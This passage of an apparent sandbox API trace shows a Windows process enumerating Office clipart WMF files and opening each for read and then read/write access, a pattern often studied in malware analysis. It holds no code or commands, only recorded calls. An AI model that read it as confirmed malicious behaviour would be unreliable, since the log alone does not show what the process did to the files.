Parameter=0x1086e48, Context=0x0) returned 1 [0101.937] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4354, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD05119_.WMF", cAlternateFileName="")) returned 1 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0101.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0101.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0101.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0101.938] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0101.938] AreFileApisANSI () returned 1 [0101.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF", lpUsedDefaultChar=0x0) returned 69 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0101.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.938] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0101.938] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0101.939] AreFileApisANSI () returned 1 [0101.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0101.939] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0101.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 69 [0101.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.034] GetFileType (hFile=0x33c) returned 0x1 [0102.034] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0102.034] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.034] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.035] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.035] CloseHandle (hObject=0x33c) returned 1 [0102.035] AreFileApisANSI () returned 1 [0102.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aa88 [0102.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8aa88, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 69 [0102.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.035] GetFileType (hFile=0x33c) returned 0x1 [0102.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0102.036] CloseHandle (hObject=0x33c) returned 1 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.036] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.036] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.037] AreFileApisANSI () returned 1 [0102.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0102.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 69 [0102.037] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccfc47e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4354)) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.037] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0102.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.037] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.037] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xccd61fa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xccd61fa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccd61fa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ef0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD06102_.WMF", cAlternateFileName="")) returned 1 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.037] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0102.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0102.038] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.038] AreFileApisANSI () returned 1 [0102.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0102.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.038] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.038] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0102.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.039] AreFileApisANSI () returned 1 [0102.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.039] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 69 [0102.039] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.039] GetFileType (hFile=0x33c) returned 0x1 [0102.039] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.039] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.040] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.040] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.040] CloseHandle (hObject=0x33c) returned 1 [0102.040] AreFileApisANSI () returned 1 [0102.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.040] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a400 [0102.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 69 [0102.040] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.040] GetFileType (hFile=0x33c) returned 0x1 [0102.040] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0102.040] CloseHandle (hObject=0x33c) returned 1 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.041] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.041] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.042] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.042] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.042] HeapFree 